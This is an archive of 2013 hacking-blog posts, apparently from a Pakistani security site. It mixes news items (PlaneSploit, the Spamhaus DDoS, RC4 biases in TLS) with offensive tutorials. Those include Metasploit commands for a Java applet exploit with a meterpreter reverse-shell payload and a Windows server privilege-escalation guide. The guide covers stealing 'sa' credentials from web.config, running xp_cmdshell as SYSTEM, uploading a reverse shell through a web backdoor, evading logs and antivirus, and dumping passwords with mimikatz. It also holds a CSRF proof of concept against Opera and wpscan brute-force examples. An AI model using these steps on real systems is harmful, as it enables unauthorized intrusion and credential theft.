Tuesday, April 30, 2013

Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a type confusion, due to weak access control when setting final fields on static classes, and runs code outside the Java sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play through a specially crafted JNLP file. The bypass applies mainly to IE, where Java Web Start can be launched automatically through the ActiveX control; otherwise the applet is launched without the click-to-play bypass.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)

msfconsole
msf > use exploit/multi/browser/java_jre17_reflection_types
msf exploit(java_jre17_reflection_types) > show payloads
msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]
msf exploit(java_jre17_reflection_types) > exploit

Friday, April 26, 2013

Hacking Windows Servers - Privilege Escalation


Most of us here can hack websites and servers. But what we hate the most is one error message: Access Denied! We know some methods to bypass certain restrictions, such as the symlink trick, privilege escalation using local root exploits and similar attacks.

But these get the job done only on Linux servers. What about Windows servers?


Here are some ways to bypass certain restrictions on Windows servers or to get SYSTEM privileges.
  • Using the "sa" account to execute commands through an MSSQL query via the 'xp_cmdshell' stored procedure.
  • Using a meterpreter payload to get a reverse shell on the target machine.
  • Using browser_autopwn. (Really...)
  • Using other tools like pwdump7, mimikatz, etc.

Using the tools is the easy way, but the real fun of hacking lies in the first three methods mentioned above.

1. Using xp_cmdshell-

Most of the time on Windows servers we have read permission over the files of other IIS users, which is what this method needs.
If we are lucky enough, we will find the login credentials of the MSSQL server's "sa" account inside the web.config file of some website.
You must be wondering: why only "sa"?
Here, "sa" stands for Super Administrator and, as the name suggests, this user has all possible permissions over the server.
The picture below shows the connection string containing the login credentials of the "sa" account.


Using these, we can log into the MSSQL server locally (using our web backdoor) as well as remotely. I would recommend remote access because it does not generate web server logs, which would otherwise fill the log file with our web backdoor path.
So, after getting the "sa" account, we can log in remotely using HeidiSQL.
HeidiSQL is an awesome tool for connecting to remote database servers. You can download it here.

After logging into the MSSQL server with the sa account, we get a list of databases and their contents.


Now we can execute commands using MSSQL queries via xp_cmdshell (with administrator privileges).

Syntax for the query is-
xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-
xp_cmdshell 'whoami'


This shows that I am currently NT AUTHORITY\SYSTEM, which, as most of us know, is the highest user in the Windows user hierarchy.
Now we can go for some post-exploitation, like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have the xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.

2. Meterpreter Payload-

This method is quite easy and comes in useful when we cannot read other users' files but can execute commands.
Using Metasploit, generate a reverse shell payload binary.

For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we upload this executable to the server using our web backdoor.
Run the multi/handler at our end. (Make sure the ports are forwarded properly.)
Now it's time to execute the payload.
If everything goes right, we get a meterpreter session on the target machine, as shown below.
We can also use PHP, ASP or other payloads.


3. Browser Autopwn-
This seems an odd way of hacking a server, but I found it a clever way to do the job, especially in scenarios where we are allowed to execute commands but cannot run executables (our payloads) because of software restriction policies in a domain environment.
Most Windows servers have an outdated Internet Explorer, and we can exploit it if we can execute commands.
I think it is clear by now what I'm trying to explain ;)
We can start Internet Explorer from the command line and make it browse to a specific URL.

Syntax for this-
iexplore.exe [URL]

Here URL is the address of our server running browser_autopwn. After that we can use railgun to avoid antivirus detection.


4. Using readily available tools-
Tools like pwdump and mimikatz can crack the passwords of Windows users.

#pwdump7 gives out the NTLM hashes of the users, which can be cracked further using John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:


#mimikatz is another great tool, which extracts the plain-text passwords of users from lsass.exe. The tool is in a language other than English, so do watch tutorials on how to use it.
The following picture shows plain-text passwords from mimikatz:


You can google them and learn how to use these tools and what they actually exploit to get the job done for you.

I hope you can now exploit every other Windows server.
Happy Hacking :)

About The Author

This article has been written by Deepankar Arora. He is an independent security researcher from India and has been listed in various halls of fame.

Wednesday, April 17, 2013

Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera



Nowadays I am not very active in bug bounty programs; however, I still wanted to share my experience with Opera. Opera does not have a bug bounty program, but they certainly have their own way of thanking researchers: sending them some swag and listing their name in their Hall of Fame.

I reported a few vulnerabilities to Opera, including a stored XSS, a CSRF and a clickjacking vulnerability. The POCs for the vulnerabilities are as follows:

Stored XSS 


The "Username" input was not being sanitized properly, which resulted in the execution of JavaScript.

CSRF POC

The form was missing CSRF tokens; an attacker could have used a CSRF attack to manipulate the form details.

POC

<html>
  
  <body>
    <form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
      <input type="hidden" name="email" value="rafaybaloch&#64;gmail&#46;com" />
      <input type="hidden" name="name" value="Rafay&#32;Baloch" />
      <input type="hidden" name="address1" value="f&#45;10&#44;afasf&#32;afs&#32;asf&#32;1&#44;block&#32;15&#32;near&#32;income&#32;tax&#32;office&#44;asssssss&#45;e&#45;johar" />
      <input type="hidden" name="address2" value="" />
      <input type="hidden" name="city" value="Karachi" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="country" value="PK" />
      <input type="hidden" name="zip" value="44000" />
      <input type="hidden" name="phone" value="&#43;923333333333" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Opera Hall Of Fame

So, for my findings, Opera listed my name in their Hall of Fame:



Gift from Opera

As a token of appreciation, they also sent me the following gifts:


Opera is still sending out some good stuff; I would recommend researchers start looking at Opera's subdomains for low-hanging fruit such as XSS. I know there are a lot of vulnerabilities out there unfixed.

Monday, April 15, 2013

Won Network Designing Competition At PROCOM 2013


I am sorry, friends, that I haven't been able to post; I was really busy with some pentesting projects and my research. Nowadays I am doing more learning than teaching. When I came into the hacking scene 6 years ago, I started with network security, but later everything shifted to layer 7, i.e. the web, so I started researching web application security. However, since network and web work together, we cannot completely ignore the network security part.

Recently, we participated in "PROCOM 2013" on behalf of Bahria University Karachi (team name: White Tigers), along with my two friends "Mudassir" and "Zia Khan", and by the grace of Almighty Allah we managed to win the competition. Procom is the largest educational event that takes place every year at FAST University; it hosts more than 40 competitions, including speed programming, network designing, painting, etc.


The competition was based on 5 rounds, which tested both the theoretical and practical knowledge of the students. The major advantage was that lots of questions came from network security, which, by the way, I have been studying for a few years. The things I learned from my CCNP ROUTE course also came into play and helped me a lot. My friend Mudassir did really well too; he is doing his CCIE and is very sound in networking stuff.

What's Next?

Well, I will continue my research on network and web application security. I am also writing a book on "Advanced Ethical Hacking", which, by the way, I am hoping to finish this year. Apart from that, I will also move to the programming side and participate in the "Speed Programming Contest", aiming to win it at least once.

I would love to hear your suggestions on improving at speed programming; either leave a comment or mail me directly at rafayhackingarticles@gmail.com.

Sunday, April 14, 2013

Hijacking An Aircraft With An Android App


Well, vulnerabilities are never going to end; or should we say vulnerabilities and new inventions walk side by side.
Recently a terrifying prospect, a hack that allows an attacker to take control of plane navigation and cockpit systems, was revealed at a security conference in Europe: an Android application called PlaneSploit that would allow an attacker to remotely attack and hijack commercial aircraft. This app was developed by Hugo Teso, a researcher at the security consultancy N.Runs in Germany, who is also a commercial airline pilot.


He further added, "He explained that by building an exploit framework called Simon and a complementary Android app that delivers attack messages, he could manipulate a plane's path as he saw fit."
With these vulnerabilities in mind, he used virtual planes in a lab to demonstrate his ability to hijack a plane rather than attempting to take over a real flight, as that was "too dangerous and unethical." He used ACARS to gain access to the plane's onboard computer system and uploaded Flight Management System data.

"I expected them to have security issues but I did not expect them to be so easy to spot. I thought I would have to fight hard to get into them but it was not that difficult," Teso said.

How to Solve problem of wpscan in Backtrack 5 r3?

WPScan is a WordPress security scanner which comes pre-installed in BackTrack 5, but it is an outdated version, so when you try to update it you may face some problems. Here is the solution that worked for me.

cd /pentest/web
rm -rf wpscan          # drop the outdated copy shipped with BackTrack
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
gem install bundler && bundle install --without test development
apt-get install libxml2 libxml2-dev libxslt1-dev   # native libraries the Ruby gems build against
gem install bundler
bundle install
ruby ./wpscan.rb


==WPSCAN ARGUMENTS==

--update   Update to the latest revision

--url   | -u <target url>  The WordPress URL/domain to scan.

--force | -f Forces WPScan to not check if the remote site is running WordPress.

--enumerate | -e [option(s)]  Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    vp       only vulnerable plugins
    ap       all plugins (can take a long time)
    tt       timthumbs
    t        themes
    vt       only vulnerable themes
    at       all themes (can take a long time)
  Multiple values are allowed : '-e tt,p' will enumerate timthumbs and plugins
  If no option is supplied, the default is 'vt,tt,u,vp'

--exclude-content-based '<regexp or string>'  Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied
                                              You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)

--config-file | -c <config file> Use the specified config file

--follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not

--wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed

--wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed

--proxy <[protocol://]host:port>  Supply a proxy (will override the one from conf/browser.conf.json).
                                  HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used

--proxy-auth <username:password>  Supply the proxy login credentials (will override the one from conf/browser.conf.json).

--basic-auth <username:password>  Set the HTTP Basic authentication

--wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.

--threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)

--username | -U <username>  Only brute force the supplied username.

--help     | -h This help screen.

--verbose  | -v Verbose output.

==WPSCAN EXAMPLES==

Do 'non-intrusive' checks...

  ruby wpscan.rb --url www.example.com

Do wordlist password brute force on enumerated users using 50 threads...

  ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

Do wordlist password brute force on the 'admin' username only...

  ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

Enumerate installed plugins...

  ruby wpscan.rb --url www.example.com --enumerate p

==WPSTOOLS ARGUMENTS==

--help    | -h   This help screen.
--Verbose | -v   Verbose output.
--update  | -u   Update to the latest revision.
--generate_plugin_list [number of pages]  Generate a new data/plugins.txt file. (supply number of *pages* to parse, default : 150)
--gpl  Alias for --generate_plugin_list
--check-local-vulnerable-files | --clvf <local directory>  Perform a recursive scan in the <local directory> to find vulnerable files or shells

==WPSTOOLS EXAMPLES==

- Generate a new 'most popular' plugin list, up to 150 pages ...
ruby wpstools.rb --generate_plugin_list 150

- Locally scan a wordpress installation for vulnerable files or shells :
ruby wpstools.rb --check-local-vulnerable-files /var/www/wordpress/

If this solution does not work for you, try upgrading your Ruby version and then proceed with the installation.

Tuesday, April 9, 2013

Zeus Master turned down Israel



Recently, hackers worldwide started #OpIsrael and targeted Israeli websites, which caused massive disruption to government, academic and private sites. According to the news media, Israel asked the Algerian Hamza, "the happiest hacker", to intervene to save Israel from the heavy losses in exchange for his release, but he refused to help them.


Hamza, who hacked sensitive sites in the U.S. and was then arrested by Interpol, is accused by US authorities of hacking into private accounts at more than 217 banks and financial companies worldwide, causing millions of dollars in losses. He was arrested in Thailand while traveling with his family following a holiday in Malaysia, en route to Cairo, Egypt.

"The arrest warrant specifically mentioned that bail is not allowed," the court said.

About the author

This article has been written by Fahad Awan. He is the newest author on the RHA team.

Thursday, April 4, 2013

Anatomy of the Largest DDoS Attack That Almost Took Down the Internet




Recently, the largest DDoS attack in the history of the internet was observed. According to reports from various websites, the attack was of more than 300 GB/second. It all started when Spamhaus (a non-profit organization) that manages the spam filters for various websites blacklisted a Dutch-based web hosting company, Cyberbunker. Cyberbunker allows a user to host everything other than child pornography and material related to terrorism. This allows an attacker to host any malicious software, such as a botnet. A botnet can be used for a variety of purposes, ranging from stealing credit card information and infecting PCs to denial of service attacks.
In an interview with the BBC, Spamhaus blamed Cyberbunker for the ongoing attacks; they said that Cyberbunker had joined hands with attackers to perform DDoS attacks in order to compromise the availability.


The attack was a denial of service attack, which is often used by attackers to compromise the availability of a website by flooding it with a huge number of packets (in most cases). The DDoS attack was aimed at the DNS servers of Spamhaus. A DNS server is responsible for the translation between domain names and IP addresses; in simple words, when we access any website on the internet, on the back end we are actually accessing the IP address, and DNS simplifies the process.

The experts call the attack the biggest DDoS attack in the history of the internet. Normally, when we talk about a massive DDoS attack against huge infrastructures, it ranges from 30 to 50 GB per second of traffic; however, this attack was more than 300 Gbps. The company moved to CloudFlare (a web performance and security company) in order to protect their services from being taken down. Initially they were receiving 10 Gbps of traffic, but the attack got even worse and the highest peak noted was around 300 Gbps. Then, instead of going after Spamhaus, the attackers targeted CloudFlare itself; they failed to knock over CloudFlare's servers, even with 100 gigabits of traffic, after which they targeted CloudFlare's bandwidth providers, known as "Tier 2", who themselves buy bandwidth from Tier 1 providers. The major traffic load was carried by Tier 1, which reported more than 300 Gbps of traffic, making it the largest DDoS attack ever.

Now, one might wonder how this slows down the internet. It is because of how the internet works: the internet is simply a collection of networks. Let's say we are connecting to google.com from Pakistan: our browser sends an HTTP request, and the packets it sends and receives are hopped across lots of routers and networks in between until they reach the Google servers. As mentioned previously, Tier 2 buys bandwidth from Tier 1, and Tier 1 connects to other Tier 1 providers to ensure that all the networks are connected with each other. Tier 1 providers are the core of the internet, and the Tier 1 provider ended up absorbing all the traffic. CloudFlare reported that Tier 1 providers for Europe were affected, as a result of which an internet slowdown was noticed by people surfing the internet in those areas. However, in Pakistan the severity was very low, so no major slowdown was noticed.

Lots of Pakistani websites are hosted abroad; the following is a list of them:

www.pakistan.gov.pk (Main Pakistan Government Portal)
www.infopak.gov.pk (Ministry of Information and Broadcasting)
www.interior.gov.pk (Ministry of Interior)
www.e-government.gov.pk (E-Government Directorate)
www.pta.gov.pk (Pakistan Telecom Authority)
www.pc.gov.pk (Planning Commission)
www.sindh.gov.pk (Government of Sindh)

As a result, they are suffering the outage and lots of Pakistani users are not able to access these websites. If we hosted these servers in Pakistan, the attack would initially be mitigated; however, it would raise a lot of security concerns, since Pakistani servers would be easier for attackers to compromise and knock offline, due to poor security and patch management. Also, I don't see any protection against DoS attacks; perhaps if they could acquire CloudFlare's protection services, the DoS attacks could be mitigated easily.

Monday, April 1, 2013

HTTPS Cracked! SSL/TLS Attacked And Exploited


People who blog about ethical hacking have a very sincere relationship with cryptographers. They (the cryptographers) keep bringing something delightful into the everyday nonsense, and we blabber about their accomplishments until it's squishy and old; this love goes far beyond what can be comprehended by normal folk. No offence.
It seems like they have swept us off our feet again, and this time around they are flaunting the big guns. Cryptographers have targeted SSL/TLS and done some serious damage to HTTPS. Transport Layer Security didn't face a major blow from the attack, as it requires capturing millions and billions of connections containing the same plaintext. But it highlights a major issue with using the RC4 encryption algorithm.

RC4 uses the same key for encryption and decryption, whereas TLS uses a public/private key pair for encryption and decryption, which makes it slow; therefore it uses a hybrid approach. A TLS connection can be set up using public/private key pairs and, once established, can share encrypted data over a secure channel using symmetric ciphers such as AES, DES, Triple-DES, Blowfish, RC4, etc.




RC4 has been advised against many times in the past, but it is also a fact that it carries half of all TLS traffic. So, the attack was done on a part of TLS by AlFardan, Bernstein, Paterson, Poettering and Schuldt (AlFBPPS).

According to Sophos's Naked Security team:


RC4 is a stream cipher, so it is basically a keyed cryptographic pseudo-random number generator (PRNG). It emits a stream of cipher bytes that are XORed with your plaintext to produce the encrypted ciphertext.
To decrypt the ciphertext, you initialise RC4 with the same key and XOR the ciphertext with the same stream of cipher bytes. XORing twice with the same value "cancels out", because k XOR k = 0, and because p XOR 0 = p.

RC4 generates statistically anomalous output initially in each stream of cipher bytes. Therefore it is not a high-quality cryptographic PRNG. This phenomenon was first observed by Itsik Mantin and Adi Shamir in 2001. They noticed that during the second output byte the value zero turned up twice as often as it should (256 keys on average, to be precise, with a probability of 1/128). This resulted in WEP being attacked, which was then replaced by WPA.




AlFBPPS have taken this attack further than anyone else, "producing statistical tables for the probability of every output byte (0..255) for each of the first 256 output positions in an RC4 cipher stream, for a total of 65535 (256x256) measurements."


By using a sufficiently large sample size of differently-keyed RC4 streams, they achieved results with sufficient precision to determine that almost every possible output was biased in some way.
The probability tables for a few of the output positions (which are numbered from 1 to 256) are shown below.
The authors realised that if you could produce TLS connections over and over again that contained the same data at a known offset inside the first 256 bytes (for example an HTTP request with a session cookie at the start of the headers), you could use their probability tables to guess the cipher stream bytes for those offsets.

Here's a brief description of how it works, by the Naked Security team:
"Imagine that you know that the 48th plaintext byte, P48, is always the same, but not what it is.
You provoke millions of TLS connections containing that fixed-but-unknown P48; in each connection, which will be using a randomly-chosen session key, P48 will end up encrypted with a pseudo-random cipher byte, K48, to give a pseudo-random ciphertext byte, C48.
And you sniff the network traffic so you capture millions of different samples of C48.
Now imagine that one value for C48 shows up more than 1% (1.01 times) more frequently than it ought to. We'll refer to this skewed value of C48 as C'.
From the probability table for K48 above, you would guess that the cipher byte used for encrypting P to produce C' must have been 208 (0xD0), since K48 takes the value 208 more than 1% too often.
In other words, C' must be P XOR 208, so that P must be C' XOR 208, and you have recovered the 48th byte of plaintext.
The guesswork gets a little harder for cipher stream offsets where the skew in frequency distribution is less significant, but it's still possible, given sufficiently many captured TLS sessions.
AlFBPPS measured how accurate their plaintext guesses were for varying numbers of TLS sessions, and the results were worrying, if not actually scary:

"However, given the huge number of TLS sessions required, The Register's provocative URL theregister.co.uk/tls_broken might be going a bit far.
Initiating 2^32 (4 billion), or even 2^28 (260 million), TLS sessions, and then sniffing and post-processing the results to extract a session cookie, is unlikely to be a practicable attack any time soon.
If nothing else, the validity of the session cookie might reasonably be expected to be shorter than the time taken to provoke hundreds of millions of redundant TLS connections.
On the other hand, the advice to avoid RC4 altogether because of its not-so-random PRNG can't be written off as needlessly conservative.
If you can, ditch RC4 from the set of symmetric ciphers your web browser is willing to use, and your web servers to accept.
Go for AES-GCM instead.
GCM, or Galois/Counter Mode, is a comparatively new way of using block ciphers that gives you encryption and authentication all in one, which not only avoids the risky RC4 cipher, but neatly bypasses the problems exposed in the Lucky 13 attack, too."
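The bias the quoted passages rely on is easy to measure for yourself. The following added example (not code from the original post or from the Naked Security article it quotes) implements textbook RC4 from scratch, counts how often the second keystream byte is zero across random 128-bit keys (constructed from a seeded generator), and shows why a byte that is fixed at that position across many differently-keyed streams stops being secret; the recovery step generalises the article's position-48 argument to the well-known position-2 case.

```python
# Added example: measuring the Mantin-Shamir bias in RC4 keystream byte 2.
# Pure-Python textbook RC4; sample keys come from a seeded PRNG so the
# experiment is repeatable. Not the original post's code.
import random
from collections import Counter


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key scheduling (KSA) followed by `length` PRGA bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA: key-dependent permutation
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # PRGA: emit one byte per step
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _random_key(rng: random.Random) -> bytes:
    # Constructed 16-byte key, the size of the RC4-128 keys TLS uses.
    return bytes(rng.getrandbits(8) for _ in range(16))


def zero_rate_at_position(pos: int, trials: int, seed: int = 1) -> float:
    """Fraction of random keys whose keystream byte at `pos` (1-based, as in
    the article) is zero. A uniform byte would give 1/256; position 2 gives
    roughly 1/128, which is the 2001 Mantin-Shamir observation."""
    rng = random.Random(seed)
    zeros = 0
    for _ in range(trials):
        if rc4_keystream(_random_key(rng), pos)[pos - 1] == 0:
            zeros += 1
    return zeros / trials


def recover_second_byte(plaintext_byte: int, trials: int, seed: int = 2) -> int:
    """The article's argument applied at position 2: the same (unknown) byte
    is encrypted under many random keys, and we only see the ciphertext
    bytes. Because K2 is biased toward 0, the most frequent ciphertext value
    is P2 XOR 0, i.e. the plaintext byte itself."""
    rng = random.Random(seed)
    seen = Counter()
    for _ in range(trials):
        seen[rc4_keystream(_random_key(rng), 2)[1] ^ plaintext_byte] += 1
    return seen.most_common(1)[0][0]


if __name__ == "__main__":
    n = 20000
    print("P(K2 == 0) = %.5f, uniform would be %.5f" % (zero_rate_at_position(2, n), 1 / 256))
    print("byte recovered from ciphertext frequencies alone:", recover_second_byte(ord("A"), n))
```

Twenty thousand keys already make the doubled zero rate at position 2 obvious; the weaker biases at later positions are why the paper needs hundreds of millions of sessions, and why the only real fix is to stop negotiating RC4 at all.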
Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of the RHA team.